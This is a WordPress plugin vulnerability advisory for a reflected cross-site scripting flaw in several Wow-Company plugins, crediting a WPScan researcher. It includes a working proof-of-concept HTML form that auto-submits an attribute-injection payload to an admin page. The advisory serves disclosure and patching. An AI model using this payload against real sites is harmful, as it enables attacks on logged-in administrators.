WordPress Plugin Vulnerabilities

Multiple Plugins from Wow-Company - Reflected XSS

Description

The plugins do not escape the page parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin

Proof of Concept

Make a logged in admin open a page with the code below

<html>
  <body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin.php?page=float-menu" method="POST">
      <input type="hidden" name="page" value='"accesskey=X onclick=alert(/XSS/)//>' />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

The XSS will be triggered when pressing ALT+SHIFT+X on Windows and CTRL+ALT+X on OS X

Affects Plugins

Fixed in 5.0.2
Fixed in 3.0.4
Fixed in 2.3.5
Fixed in 1.5.1
Fixed in 1.2.2
Fixed in 5.3.1
Fixed in 5.2.2
Fixed in 2.2.2
Fixed in 4.0.2
Fixed in 3.1.1
Fixed in 4.0.2
Fixed in 2.5.6

References

Classification

Type
XSS
CWE

Miscellaneous

Original Researcher
Erwan LR (WPScan)
Verified
Yes

Timeline

Publicly Published
2023-05-22 (about 11 months ago)
Added
2023-05-22 (about 11 months ago)
Last Updated
2023-05-22 (about 11 months ago)

Other